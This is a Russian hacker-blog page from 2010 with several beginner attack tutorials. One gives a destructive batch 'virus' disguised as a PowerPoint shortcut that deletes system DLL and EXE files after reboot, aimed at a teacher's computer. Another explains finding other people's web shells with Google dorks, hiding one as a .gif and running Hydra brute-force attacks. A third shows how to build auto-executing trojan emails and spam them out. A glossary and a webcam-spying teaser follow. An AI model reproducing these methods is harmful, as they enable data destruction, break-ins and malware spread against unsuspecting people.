Иногда задают вопрос — можно ли все-таки сделать аппаратный декодер, то есть обойтись без компьютера? В принципе это возможно, на сайте www.eurosat.com/salp описан декодер, декодирующий все французские каналы. Так как PC TV с ключом Key.txt подходящим для НТВ+ открывает французские каналы, логично предположить, что данный аппаратный декодер будет открывать и НТВ+, однако я не знаю случаев, чтобы это кто-то проверил на практике. Изготовление данного декодера технологически сложно и может обойтись не в одну сотню долларов, а так же нет никакой гарантии в успехе этого предприятия и поэтому на сегодняшний день наиболее простым способом просмотра каналов кодированных в Nagravision является PC TV.

Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!

Вирус в bat файле для класухи ;)

admin — Thu, 13 May 2010 05:05:32 +0000

Здравствуйте, товарищи! Сегодня ночью делать было совершенно нефиг, ну и задумался: «а как можно сломать комп програмным способом, но так, чтобы это не сразу спалили?». Я нашел ответ. Он находится в bat файлах.
План был таков:
СО СТОРОНЫ КЛАСУХИ И ОДНОКЛАССНИКОВ:
Я подхожу к компу, вставляю туда флеху, каспер(скорее всего) будет ругаца на файл autorun.inf, который автоматом копируеца на флеху с вирусованного компа класухи. Удаляем… Открываем флешку, там лежит файл Презентация.ppt. Это презентация MS Power Point, если кто не знает. Вот я щелкнул разок по этой презентации, экран моргнул пару раз, видимо павер пойнт загружаеца. Вот, йа показал свою презентацию, получил свою оценку, выдернул флеху, сел за свое место, а там дальше следующие люди показывают свои презентации. Вроде все нормально. Ну, када комп не нужен, класуха его вырубает, а патом включает, и обнаруживает то, что венда не грузица, или грузица но как то неправильно. Ребутит комп, и обнаруживает полное отсутствие венды на компе. ЧТО СЛУЧИЛОСЬ?!?!
Попробую объяснить. Разберем теперь и со стороны одноклассников(которые вапще ХЗ отом, что там на флехе хранится).
Вот я встаю с места по просьбе училки. Иду к столу, вставляю флеху в дополнительный слот USB в клаве. Комп опреледяет, что воткнуто что то похожее на флеху. Каспер(скорее всего) будет ругаца на файл autorun.inf, который автоматом копируеца на флеху с вирусованного компа класухи. Удаляем… Открываем флешку, там лежит файл Презентация.ppt. Это презентация MS Power Point, если кто не знает. На самом деле это не ppt файл. У нее на компе в параметрах «Свойства папки>Вид» стоит галочка на «Скрывать расширения для зарегистрированных типов файлов». На самом деле этот файл имеет имя Презентация.ppt.lnk. Это, как вы поняли, ярлык. Но ярлык со значком от пауэр пойнта. Рядом со значком презентации есть папка test. Содержимое папки никто не знает. Файл Презентация.ppt.lnk запускает файл runner_copier.bat.
Файл runner_copier.bat совершает следующие действия:
-открывает файл pres.ppt с самой презентацией, которую йа должен показать
-копирует заранее написанный файл AUTOEXEC.BAT в C:.
Самое интересное заключается в павер пойнте. Так как он моргает перед полной готовностью, то многие, не зная, фчом прикол, могут не заметить моргнувшее окошко коммандной строки, которая, как раз и копирует заготовленный AUTOEXEC.BAT в заветный C:.
Теперь я расскажу, что находится в файле AUTOEXEC.BAT. Стандартный такой файл у меня имеет следующий вид:
goto %config%
:dos1
rem c:vc401vc
lh keyrus
lh mmouse
lh C:WINDOWSCOMMANDmscdex /d:12345678
lh dndn
bootgui=0
:dos2
rem essolo.com
lh keyrus
lh mmouse
lh dndn
bootgui=0
:win
rem c:essolo.com
set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:windowscomand;c:arc;c:dn
C:WINDOWSCOMMANDDELTREE /y C:WINDOWSTEMP*.*
mode con codepage prepare=((866) C:WINDOWSCOMMANDega3.cpi)
mode con codepage select=866
keyb ru,,C:WINDOWSCOMMANDkeybrd3.sys
goto continue
:meos
c:kolibrimeosload.com
:l:meosload.com
:continue
rem bootgui=1
Но я его немного подправил. Я всего лишь добавил в конец следующие строки:
cd
cd windows
del *.dll
del *.ini
cd system32
del *.dll
del *.exe
и все!
Действие самого вируса происходит следующим образом:
1)запускаеца файл Презентация.ppt.lnk
2)он ссылаеца на файл runner_copier.bat
3)файл runner_copier.bat заменяет файл AUTOEXEC.BAT, лежащий в C: на заранее заготовленый AUTOEXEC.BAT, который лежит на флехе в папке test.
4)дальше не происходит ничего. Пока включен комп, ничего не произойдет.
5) комп выключается
6) комп включаеца и при загруске венды загружается то, что описано в AUTOEXEC.BAT. Тут то и начинается самое интересное.
7) в этом батике указано следующее: загруска дров крысы, клавы, моника, и прочего.
8)как только загрузились драйвера, то этот батник дает задание венде самоудалица. Удаляюца файлы *.dll и *.exe из папок WINDOWS и system32.
9)скорее всего, комп не увидит никакой оси, т.к. больше половины файлов в папке WINDOWS и вовсех вложенных папках как раз дллки и екзешники.
end.
Если у кого есть идеи по изменению программы, пишите. НО! Программа должна удовлетворять таким критериям:
-малый размер
-незаметность
-неизвестность антивирям
-большие масштабы действия
-действие вируса осуществляется только после перезапуска компа(чтобы сразу не спалиться).
В остальном полная свобода.
Удачи в написании вирусов, товарищи!

Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!

Даёшь каждому по HYDRA.

admin — Thu, 13 May 2010 05:05:32 +0000

Сразу же хочу заметить, что статья нацелена на новичков. Очень надоело наблюдать на форуме просьбы типа сломать мэил или асю. Надеюсь, после прочтения статьи, хотя бы 20% научатся делать это сами.
Все наверно слышали о брутерах?! В принципе, не важно, кто не слышал, может дальше не читать Я не буду описывать здесь брутеры, их качества, плюсы, минусы и т.д. и т.п. В данной статье будет поставлена лишь одна цель, завести свою гидру без получения высоких привилегий на сервере, будет достаточно вэб-шелла.
И так, начнём, немного о гидре:
Hydra — универсальный и уникальный в своём роде брутфорсер, умеет подбирать пароли к MySQL, MSSQL, POP3, IMAP, HTTP, HTTPS, ICQ, SSH, FTP, Basic-auth и др. Имеет встроенную поддержку работы через соксы и прокси. Скачать можно здесь http://thc.org/download.php?t=r&f=hydra-5.2-src.tar.gz
Приступим, что нам потребуется:
1. Вэб-шелл на сервере с доступом к коммандному интерпритатору — 1 шт.
2. Руки 2 шт. Можно обойтись и одной, главное чтоб прямая была
Многие наверно задались вопросом об вэб-шелле, где же его взять?! Да, вопрос специфичный, а ответ в свою очередь довольно таки простой — взломать и залить. «Я же новичок?!» подумали сейчас многие! Не спорю, я тоже
Теперь всё-таки немного придется отойти от нашей намеченной цели. Найдём себе вэб-шелл! Есть один простой, но проверенный способ, набираем в адресной строке браузера google.com, там в свою очередь в поисковой строке вбиваем, что-то типо:
intitle:c99madshell uname filetype:php
intext:c99shell intitle:c99shell
intext:edited by crazydaned
intext:safe-mode: off (not secure)
intitle: — c99madshell
inanchor:c99shell filetype:php
allintext: uid=() gid=() groups=()safe-mode: off (not secure
intitle:c99madshell uname
(intitle:locus7shell | intitle:r57shell) uname
intitle:r57shell intext:uname
safe-mode: off (no secure)
safe-mode: off (not secure) c99shell
Или подобные «нехитрые» запросы,и получим лист вэб-шеллов проиндексированных поисковиком. Кому не нравится такой способ, доставайте вэб-шеллы сами
И так, предположим, что шелл нашли. Смотрим Safe-mode: OFF, это хорошо, один из главных критериев, если наоборот то ищем другой, так же узнаём юзера коммандой id и смотрим /etc/passwd, есть ли доступ к /bin/bash, или к другому интерпритатору комманд, иначе мы не сможем выполнять нужные нам действия. Теперь нужно найти каталог на запись. Немного поковыряв, найдите каталог доступный на запись, и залейте в него архив с гидрой.
Залили? Ок, хорошо. Теперь распаковываем и устанавливаем, чтоб не приходилось выполнять команды отдельно их можно объединить через ;, вбиваем в шелле tar zxf hydra-5.2-src.tar.gz;cd hydra-5.2-src;./configure;make, жмём кнопочку Execute. Смотрим в окне, должен появиться лог выполнения команд, если лога нету, значит у юзера не хватает прав на выполнение. Если всё гуд, далее переходим в каталог hydra-5.2-src. Запускаем гидру, вбиваем ./hydra и любуемся выполнением нашей гидры
И так, теперь стоит подумать немного о безопасности, под ней я имею ввиду — не палить в логах частое обращение к вэб-шеллу, где лежит гидра. А сделаем это мы весьма хитрым образом В первую очередь переименовываем каталог hydra-5.2-src во что-нибудь менее палевное, к примеру, images, вбиваем в командной строке cd ..;mv hydra-5.2-src images. Дальше переходим в переименованный каталог и создаём там файл .htaccess с содержимым:
AddType application/x-httpd-php .gif
Вот теперь зальём наш шелл в этот же каталог уже с расширением .gif и пробуем открыть его, ну как?) В принципе расширение можете выбрать на своё усмотрение, им может стать как .pdf .rar .bmp и с таким же успехом .avi При желании можем даже запаролить этот каталог, сделать доступ по IP и много чего другого, но об этом я писать не буду, т.к. это тема отдельной статьи, да и смысла писать про это нет, читаем ман по Apache Спешу предупредить, что сервер должен поддерживать .htaccess, иначе наш шелл работать не будет и есть вероятность того что нас спалят по логам =
Теперь переходим к самой приятной части. Качаем хорошие словарики для брута, коих сейчас полно, советую лишь одно — использовать встроенные качалки сервера (наличие таковых узнаём при помощи команды which curl wget get lynx fetch и т.п.), т.к. заливать большие словари со своей тачки будет очень долго.
Манов и видео по использованию данного брутфорсера много, любимый гугл в помощь, но все же пару полезных конструкций приведу:
./hydra -L logins.txt -P passwords.txt www.site.com -t 255 ftp
./hydra -l ftpuser -p ftppass www.site.com -t 255 ftp
./hydra -L logins.txt -P passwords.txt www.site.com -t 255 mysql
./hydra -L logins.txt -P passwords.txt pop.site.com -t 255 pop3
Единственное что хотелось бы выделить, при каждом новом задании лучше сохранять всё в лог опцией -o, либо ставить вывод в файл знаком > (К примеру ./hydra -l hacker -p pass target.com ftp >logfile.txt). Этим самым облегчим себе работу, т.к. не придёться ждать полного выполнения команды, чтоб лицезреть результат, а просто периодически будем мониторить файлик logfile.txt И напоследок хочется сказать, что в данной чудо проге мы можем указывать количество потоков от 1 до 255, и, как правило, часто бывает полезным не напрягать серв на полную катушку В принципе, у меня — всё, начинаем брутить.

Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!

Эффективный способ впаривания троянов

admin — Thu, 13 May 2010 05:05:32 +0000

конецформыначалоформыСразу предупреждаю что статья написанна для новичков в этом деле, поэтому не надо кричать и махать руками что типа всё это знаем и умеем, может вы и знаете и умеете, а другие только начинают учится и думаю им это будет полезно знать. Я знаю что об этом статьи уже писались и поэтому не претендую на полное авторство, но в тех статьях которые я видел всё описывалось скупо, отдельно, несвязанно с друг другом и неподробно, я же попытаюсь всё конкретизировать, обобщить и разложить по полочкам (даже разжевать:) так чтоб любой более менее начинающий юзверь мог во всё врубится. И так что для этого понадобится:
* The Bat! – один из лучших почтовых клиентов, (как у тебя его ещё нет, давай сейчас же дуй в какой нить поисковик , ищи его, скачивай, устанавливай и сноси нафиг свой ОутглюкЕхпресс, а то трояна впаришь не ты , а его впарят тебе, причём без твоего согласия).
* Zender – спецальная программа для посылки писем с трояном в дыру Оутглюка (качать с http://www.hack-it.by.ru/soft), о ней чуть ниже и поподробнее.
* Троян — в принципе любой, желательно чтоб не палящийся был.
* Ну и ещё какой нить joiner, их сейчас много развелось так что сами выбирайте, и желательно чтоб он умел менять иконки и закрывать анитивирусы и фаирволы ( и всего то….J).
И так способ этот рулит в Windows 95-98SE (без заплаток) и если установлен основной почтовый клиент это их же OutlookExpress 5.0, они сейчас пока наиболее распространены и в основном большинство народа юзает их….. да да WindowsХреновоРаботает ещё мало кто поставил…. Так что шансы нарваться на таких у вас большие (небось сами на этом софте то сидите ;-). И так как вы раньше рассылали ламерам трояна, брали просто атачили к письму файл с троянам, писали какой нить текст в письме чтоб жертве захотелось открыть его, рассылали по спам листам и надеялись на то что найдётся жертва которая окажется полным ламерьём и откроет приатаченный файл и вот ты уже летишь по халявному инету или форматируешь ламеру диск ( а может и идёшь по тёмному коридору заложив руки за спину в сопровождении дяденьки с отдела «Рэ» , но щас народ уже в основном учёный пошёл и просто так файлы пришедшие почтой не открывает, а для начала бережно сохраняет на диск и потом с упоением насилует их всякими там АВП , Докторами Вьебами и Нортонами, а потом уже думает открывать его или нет. Ну…..нам это надо . Какой шанс что кто то откроет и запустит к себе твою коняшку…..правильно шанс просто мизерный. Поэтому то нам надо сделать так чтоб файл в письме запустился автоматически как только жертва получит это письмо ….. ну …хорошо же чтоб так было… и не надо ни кого уговаривать ( ещё раз подчеркну что рулит всё в Win9x и OE 5.0 ). И так для начала создаём файл mail.eml , затем открываем его в любом текстовом редакторе (желательно в WordPad) и вставляем в него такую вот запись:
From: SuperMegaXaker
To:
Subject: !!!!!Poluchai gad troyana!!!!
MIME-Version: 1.0
Content-Type: multipart/related;
type=»multipart/alternative»;
boundary=»====_ABC1234567890DEF_====»
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

—====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary=»====_ABC0987654321DEF_====»

—====_ABC0987654321DEF_====
Content-Type: text/html;
charset=»iso-8859-1″
Content-Transfer-Encoding: quoted-printable

—====_ABC0987654321DEF_====—

—====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name=»Troyan.jpg.exe”
Content-Transfer-Encoding: base64
Content-ID:

На этом месте будет файл трояна в base-64 кодировке…….(внешне будет выглядеть как большой и ровный блок текста )

—====_ABC1234567890DEF_====

—====_ABC1234567890DEF_====—

Кстати в проге zender уже лежит пример готового файл Mail.eml с уже вложенным туда трояном. Открыв его также в текстовом редакторе вы и увидете как в нём будет выглядит сам файл трояна тесктом, он там как раз и будет в base-64 кодировке. Выглядеть это будет примерно вот так:
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAgAAAAA
4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC
BiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAB
QRQAATAEDAGVj+zwAAAAAAAAAAOAADwELAQED
ABAAAAAQAAAAYAAA4HkAAABwAAAAgAAAAABAAA
AQAAAAAgAAAQAAAAAAAAAEAAAAAAAAAACQAAAA
EAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAA
ABAAAAAAAAAAAAAAAKSDAAB0AQAAAIAAAKQDAA
AAAAAAAAAAAAAAAAAAААА

Это и есть сам файл трояна , просто он в кодировке base-64. Но только не открывайте этот файл вашим Оутглюком, так как у автора проги видно есть «чуство юмора» и он вместо того чтоб вложить в это письмо для примера какую-нить безобидную программку…. вложил туда настоящего своего трояна и если вы это письмо откроете своим Оутглюком то он сразу автоматически запустится у вас на компе. Ну а вы думаете почему я вас Bat поставить просил. Да и ещё установите в Бате в настройках ассоциации файлов .eml с Батом и тогда такие файлы у вас будут открыватся не в Оутглюке а в Бате и вы сможете их спокойно открывать и смотреть, так как в Бате такого бага как в Оутлюке нету. И так письмо у нас есть, теперь в него надо вставить трояна. И что надо сделать чтобы вставить в ваше в письмо mail.eml уже сконфигурированного вами вашего родного трояна и как узнать как он выглядит в base-64 кодировке. Для этого нам и пригодится Бат. Открываем его. В нём создаём новое письмо, присоединяем к нему вашего трояна и жмём на кнопочку отправить , не важно кому так как мы его отправлять ни куда не собираемся, письмо соответственно попадёт в папку «Исходящие» (это если у вас Бат русифицирован), но нам оно там нам не нужно поэтому берём и перемещаем его в папку «Входящие» (просто перетаскиваем мышкой), затем открываем его там щёлкая по нему два раза и ищем в открывшемся окне вверху меню «Спецальное» а в нём выбираем «исходный текст» и увидим наше письмо токлько файл с нашим трояном будет там как раз в нужной нам base-64 кодировке, я уже говорил как он будет выглядеть (внешнее похоже на большой блок ровного и непрерывного текста), так вот выделяем именно только этот текст и копируем его в буфер обмена (для тех кто не знает кто это такая «буфер обмена» то копируйте в простой текстовой документ :). Затем открываем наше уже заготовленное письмо mail.eml в текстовом редакторе и вставляем этот текст заместо того который я уже писал выше:
На этом месте будет файл трояна в base-64 кодировке…….(внешне будет выглядеть как большой и ровный блок текста)
Саму эту надпись конечно же удаляем!!! Сории что объясняю как даунам каким то , но ведь блин найдутся те которые так и не врубятся куда что и заместо чего вставлять. Так же можете взять пример письма из проги Zender (там он называется Mail.eml) и так же открыв его в тестовом редакторе удалить из него только текст (в base-64 кодировке) файла с трояном автора и вставить туда текст (в base-64 кодировке) уже своего сконфигурированного трояна. Кстати не забудьте поменять в файле строки From , To и Subject на нужные вам, и ещё поменяйте в строке Name=»имя_трояна.exe» на что нибудь другое типа name=»my_sexy_foto.jpg.exe». То что вы там поставите и будет отбражаться в полях письма From, To, Subject и имя приатаченного файла , которое получит жертва. Кстати нам так же пригодится и Joiner , склейте с трояном какую нить фотку, потому что не у всех может Оутглюк стоять и когда жертва будет открывать файл уже самостоятельно ей предстанет перед глазами эта фотка, а ваш троян в это время будет делать своё грязное дело. Да, ещё за место расширения файла .exe можно поставаить .scr – это расширение у скринсейверов (программ-заставок) но действовать будет так же как и с .exe , просто таким образом можно немного усыпить бдительность жертвы. Сохраняемся, и всё письмо с трояном mail.eml готово. Теперь если открыть это письмо Оутглюком то файл автоматически запустится. Теперь о том как пользоваться Zenderom для отсылки этого письма, потому как обычной почтовой програмой его не отошлёшь так как она поменяет все заголовки на другие и троян в письме уже автоматически не запустится . Для начала прочтите там файл с описанием. Если не поняли то объясню на пальцах. В начале кладёте ваше письмо mail.eml в папку с Zenderom. Там же в папке есть файл user.txt . Он нам и нужен для рассылки. В первой строчке после from= пишем любой существующий адрес на каком нить бесплатном мыльном сервисе, главное чтоб он там существовал и чтоб сервак имел smtp сервер. Ну например from=vasya@mail.ru . Он в принцепе не имеет большого значения и нужен для того чтоб прога могла через этот мыльный сервак и его smtp сервер разослать письмо уже на адреса ваших жертв. А вот на следущей строчке уже просто пишите адреса ваших жертв, их может быть сколь угодно много главное чтоб они все начинались с новой строки. Теперь запускаете саму прогу zender.exe и она разашлёт ваше письмо с трояном по всем этим адресам. Кстати у проги нет интерфейса ( т.е. ни каких окошечек у вас не появится) , так что следить за тем как она рассылает письмо можно будет по самому соединению (значок который мигает у вас в трее когда вы подключаетесь к инету). Когда она разошлёт письмо по всем указаным вами адресам то появится окошко с надписью All done это значит что письмо разослано. А если вы рассылаете не на один адресс, а например по спам листу на несколько десятков адрессов, то чтоб не ждать пока прога разошлёт файл по всем этим адрессам и не терять много драгоценного время в инете делайте так….. заведите себе например на рамблере любое мыло и поставтье на нём переадресацию на имеющиеся у вас многочисленные адресса жертв, а в файле user.txt заместо адрессов жертв напишите всего один адрес этого вашего мыла на рамблере и всё, теперь запустите прогу и она пошлёт письмо на этот адресс, а уж сервак рамблера сам сделает за вас всю грязную работу и разашлёт письмо по всем адресам которые вы указали в переадресации. Так что теперь эфективность рассылки трояна у вас значительно повысится по сравнению с тем как вы его раньше рассылали простым дедовским способом :)))). Так как ещё много тех кто сидит на Вынь9х и Отглюках :). Кстати щас само письмо mail.eml сосотавленное таким вот образом чтоб автоматически запускался приатаченный к нему файл определяется многими антивирусами как троян даже если вы туда ещё ни кого трояна и не вставляли, у меня например мой ДокторВъеб ругается на это письмо что типа это troyanIframe :)))), правда если письмо лежит в каком zip архиве то он на него молчит, хотя ведь сами архмвы он шмонать умеет хорошо, вот так то, так что на время составления письма придётся выгружать ваши антивирусные мониторы , а то ведь работать нормально не дадут :)). Ну вот и всё. По моему всё понятно рассказал. У кого будут какие вопросы пишите (можете даже такие вот письма с автозапуском… у меня всё равно Бат стоит :))))). Удачи.

Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!

Словарь терминов для новичков часть №1

admin — Thu, 13 May 2010 05:05:31 +0000

конецформыначалоформыЗдраствуйте!!! Я Keniattack, и я решил написать эту статью-словарь для того чтоб новички не мучали опытных хакеров с вопросами: а что такое IP? Или а что такое хост? Я не смогу написать много в этой статье так как я человек а не печатная машина и по этому я разделю свой словарь на несколько частей.
Просьба не судите строго это моя первая статья и не ругайте за грамматические ошибки так как я пишу в спешке))). Ну ладно поехали…
Attach — файл, «прикрепленный» к сообщению электронной почты.
E-mail: (электронная почта) — рассылка и получение сообщений при помощи электронных средств связи; как правило, это понятие ассоциируется с Интернетом.
IP-адрес — это уникальный адрес компьютера в сети Интернет, который состоит из четырех чисел, находящихся в диапазоне от 0 до 255 и разделенных точками. Например: 196.25.5.23. В Интернете можно обратиться к любому подключенному компьютеру, используя IP адрес.
FTP (File Transfer Protocol) — «протокол передачи файлов», инструмент для переноса любого файла на узловую машину. Файл можно перекачать (скопировать) по модему на собственный персональный компьютер.
Frame — специфическая область Web-страницы, содержащая данные из другой страницы.
Hits (хиты) — число посещений той или иной web-страницы
Hosts (хосты) — число посетителей той или иной web-страницы с уникальным IP-адресом
HTML (HyperText Markup Language) — язык описания гипертекста, используемый для размещения информации на Сети в виде гипертекстовых страниц, доступных через программу сканирования сети (browser), поддерживающую HTTP.
HTTP (Hypertext Transport Protocol) — протокол передачи гипертекста. — язык, при помощи которого браузер направляет на серверы запросы на web-страницы.
ICQ (I Seek You — я ищу тебя) — коммуникационная программа для Интернета, позволяющая обмениваться короткими сообщениями (аналог пейджера), а также пересылать файлы, фото и т.д. Одно из средств общения в Интернете
IP (Интернет-протокол) — идентификационный номер компьютера, подключенного к Интернету (как телефонный номер); на него также распространяются права интеллектуальной собственности.
Java — разработанный компанией Sun Microsystems набор спецификаций для создания программ (называемых аплетами), которые можно вставить в Web-страницы и которые выполняются под управлением защищенной среды, обеспечивая высокую степень безопасности.
JavaScript — язык программирования компании Netscape, с помощью которого можно работать в интерактивном режиме.
Microsoft Internet Explorer — одна из программ просмотра информации Web-серверах фирмы Microsoft, созданная на основе программы Mosaic.
On-line — доступ в режиме реального времени («здесь и сейчас»).
TCP/IP (File Transmission Control Protocol/Internet Protocol) — два стандартных протокола, используемых для установления соединения между компьютерами, входящими в Интернет. Эти протоколы позволяют различным компьютерным системам производить обмен данных.
Web-интерфейс — это то, что видит пользователь на сайте в окне своего web-браузера. Другими словами, это совокупность информации и средств навигации на web-сайте, позволяющая пользователю самостоятельно, без применения дополнительных программ пользоваться и управлять этой информацией.
Web-сайт — это участок Интернета, содержащий информацию, сгруппированную определенным образом. Другими словами, это совокупность web-файлов, которая включает в себя начальный файл, называемый домашней страницей, и другие, именуемые страницами. Просмотреть сайт можно на своем компьютере, используя специальную программу «web-броузер.» Существует большое количество различных web-браузеров, но самыми распространенными среди пользователей являются Internet Explorer (IE) компании Microsoft и Netscape Communicator (NC) компании Netscape.
Web-сервер — это компьютер, оснащенный специальным программным обеспечением, который может хранить и обрабатывать файлы одного и более web-сайтов. В случае, когда несколько web-сайтов работают на одном компьютере, web-сервером принято называть то виртуальное пространство (программное обеспечение и место на компьютере), в котором работает web-сайт. Поэтому многие говорят «web-сервер», подразумевая «web-сайт». Большие web-сайты, содержащие много информации, могут храниться и обрабатываться сразу на нескольких компьютерах. Обмен информацией с web-серверами происходит только по специальным протоколам http:// или https://.
Web-страница — отдельно взятый файл, находящийся в памяти компьютера, в котором содержится текст в формате HTML, а также графические изображения и гипертекстовые ссылки для взаимодействия с другими страницами.
WWW-адрес — это адрес сайта, обозначенный по особым правилам веба. Адрес может включать зарегистрированный домен web-сайта, а также — требуемые каталоги и файлы, расположенные на web-сервере
WWW (World Wide Web) — «всемирная паутина», средство для онлайнового доступа к информационным ресурсам Интернет. Это широко распространенный программный продукт, обеспечивающий гипертекстовый переход со страницы на страницу, а также гипертекстовую связь ресурсов Интернет в единую систему, которая предусматривает возможность навигации и поиска.
Unlimited — схема доступа в Интернет, при которой пользователь покупает доступ на определенный срок (как правило — месяц). При этом время, проведенное пользователем на линии, не учитывается.
URL (Uniform Resource Locator) — это «адрес» на WWW, единый указатель на русерс. Представляет собой имя файла или ресурса, позволяющее достичь его через Интернет и включающее, как правило, название протокола, имя узла и путь до файла.
Авторизация — проверка прав или личности пользователя, необходимая для обеспечения безопасной работы Интернета и целостности секретной информации. Обычно авторизация сводится к набору имени пользователя (логина) и пароля.
Базы данных (БД) — специальное программное обеспечение, предназначенное для организации хранения информации и доступа к ней. Используются при создании программного обеспечения для систем управления web-сайтом.
Баннер (баннерная реклама) — в общем случае, это статичное или анимированное изображение, размещаемое на страницах web-сайта с целью рекламы чего-либо. Баннер выполняет роль гиперссылки на тот или иной Интернет-ресурс.
Баннерная реклама — реклама посредством размещения баннеров на web-сайтах. При проведении баннерной рекламы имеется возможность выбора времени показа и определения целевой аудитории по интересам и территориальному признаку. Цель размещения баннера — добиться соответствующих действий со стороны пользователя, чтобы на его экране открылась web-страница с рекламируемой информацией.
Баннерные сети — это специальное программное обеспечение, позволяющее производить обмен баннерами между сайтами — участниками сети с возможностью выбора времени показа и определения целевой аудитории по интересам и территориальному признаку.
Броузер — это программа, работающая на компьютере клиента, которая посылает, принимает и отображает файлы в рамках HTTP-протокола. Современные броузеры понимают и другие протоколы, например, FTP или Gopher. В настоящее время наиболее распространенными броузерами являются: Netscape, Internet Explorer, Opera и Mosaic.
Брэндинг — имиджевая реклама, продвижение какой-либо торговой марки (брэнда). Основная ее цель — узнаваемость в потребительской среде.
Выделенка — выделенная линия. Такая обычная телефонная линия проводится телефонной компанией в квартиру, но использует только для Интернета. Поэтому качество связи лучше, скорость может быть больше во много раз чем по телефонной линии, и пользоваться ей можно круглосуточно, не занимая обычного голосового телефона.
Гипертекст — нелинейная форма записи текстовой информации с обозначением ссылок на фрагменты текста любого документа, находящегося в автоматизированной информационной системе, и возможностью быстрого перехода к этим фрагментам.
Глобальная сеть — сеть, содержащая большое количество узлов, имеющих, как правило, государственный, континентальный или межконтинентальный характер распределения ресурсов.
Гостевая книга, гостевая (от англ. guestbook) — раздел сайта, где посетители с помощью специальной формы могут высказать свое мнение о сайте. Большинство гостевых книг позволяют ознакомиться с комментариями других посетителей.
Домен (Доменное имя) — это часть WWW-адреса web-сайта, которая является его основой. Домены могут быть первого, второго, третьего и т.д. уровней, например, http://www.ru — домен первого уровня, закрепленный за Российской Федерацией, http://www.mtrx.ru- домен второго уровня. http://catalog.mtrx.ru — домен третьего уровня. Доменные имена второго уровня регистрируется специальными организациями, координирующими распределение доменных имен. Доменные имена третьего уровня может зарегистрировать администратор соответствующего доменного имени второго уровня, а доменное имя первого уровня Вы легко сможете получить, имея собственное государство.
Индексация — лексический анализ и разбор текстовых материалов сайта с целью составления списка используемых слов и выражений. Составленный таким образом список используется при поиске информации на сайте по запросу пользователя. Индексация производится в автоматическом режиме специальными программами, называемыми поисковыми роботами. Используется всеми поисковыми системами.
Интернет — это возможность, благодаря которой Вы сможете получить на своем столе любую информацию из любой точки мира, а также, не вставая со своего рабочего места, повлиять на события, происходящие в любой точке мира.
Интернет/Web-сервер — это более широкое понятие, обозначающее компьютер (или компьютеры), оснащенный специальным программным обеспечением, обеспечивающий функционирование любых необходимых (а не только веб) сервисов Интернет: http://, https:// (web-сайт), e-mail (электронная почта), ftp, конференции и т.д.
Интранет — замкнутая внутренняя локальная сеть, построенная по тому же принципу, что и Интернет.
Логин — идентификатор, используемый для входа в систему.
Локальные сети — сети, которые содержат небольшое количество узлов и распределяются внутри ограниченной территории (организация, учреждения, университета и т.п.)
Модем — устройство преобразования данных для передачи их по каналам связи. Модемы бывают внутренними (встроенными) и внешними.
Мультимедиа — особый вид компьютерной технологии, объединяющей в себе как традиционную статическую (текст, графику), так и динамическую информацию (речь, музыку, видеофрагменты, анимацию и т.д.).
Оптимизация графики — максимальное уменьшение размера файлов с изображениями при сохранении приемлемого их качества. Используется при создании web-сайта для обеспечения высокой скорости загрузки его страниц.
Поисковые системы — специальные системы, управляемые через web-интерфейс, позволяющие пользователю находить в сети web-сайты, содержащие необходимую информацию по ключевым словам. Например, http://www.yandex.ru или http://www.google.com.
Порталы — очень часто посещаемые сайты, выполняющие роль шлюзов во «Всемирную паутину» и вследствие этого представляющие большой интерес для рекламодателей.
Провайдер — это организация, предоставляющая пользователям сетевые услуги. Это фирма, которой платит пользователь за доступ к Интернет.
Релевантность сайта — степень соответствия текста сайта ключевым словам, которые указаны в поле определения ключа поиска в поисковой системе. В зависимости от этой величины поисковая система определяет порядок показа результатов поиска. Чем выше у страницы релевантность, тем ближе к началу списка она будет находиться при выдаче результатов поиска.
Регистрация доменного имени — это закрепление определенного доменного имени за тем или иным лицом путем внесения соответствующей информации в регистрационную базу данных организации, координирующей распределение доменных имен. В России в зоне .ru эти функции осуществляет Региональный Сетевой Информационный Центр. Адрес web-сайта центра http://www.nic.ru/ В 2001 году в России наметилась тенденция передачи прав на регистрацию доменов коммерческим организациям по аналогии с зарубежными схемами. Для зоны .com имена распределяют уполномоченные коммерческие компании. Например, http://www.registrator.com/.
Сервер — компьютер сети, входящей в Интернет. Сервер обеспечивает обслуживание программ-клиентов, обращающихся к нему по сети. За каждым WWW-адресом, содержимое которого просматривается в броузерах, стоит сервер, который рассылает данные, и сотня других, расположенных между данным сервером и компьютерной системой клиента.
Сеть — несколько компьютеров, соединенных вместе, что позволяет совместно использовать ресурсы и обмениваться информацией.
Система управления сайтом — программное обеспечение, позволяющее владельцу web-сайта самостоятельно управлять содержимым этого сайта через web-интерфейс без специальных знаний в области программирования.
Статистика сайта — статистические данные, полученные путем учета информации о посещении страниц сайта. В простейшем случае включает информацию о количестве и времени посещений.
Узел (или Host) — компьютер, напрямую подключенный к сети Интернет. Он предназначен для работы пользователей в сети, размещения и хранения информации. Это может быть не только компьютер, но и любое электронное устройство, передающее информацию от одного сервера к другому.
Хостинг — это размещение web-сайта абонента на оборудовании провайдера.
Хостинг-провайдер (Хостер) — организация (в основном интернет-провайдер), которая профессионально занимается предоставлением услуг хостинга.
Электронная коммерция — проведение бизнес-транзакций с помощью возможностей Интернет. Включает в себя любые формы деловой активности в сети.
Юзабильность (юзабилити, usability) — это степень удобства работы с тем или иным web-сайтом для пользователя.

Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!

Google помогает подглядывать в чужие веб-камеры

admin — Thu, 13 May 2010 05:05:31 +0000

конецформыначалоформыСуществует простой способ находить незащищенные веб-камеры, подключенные к Сети. С их помощью любой желающий может увидеть, что происходит в офисах и домах незадачливых пользователей, не думающих о собственной безопасности.
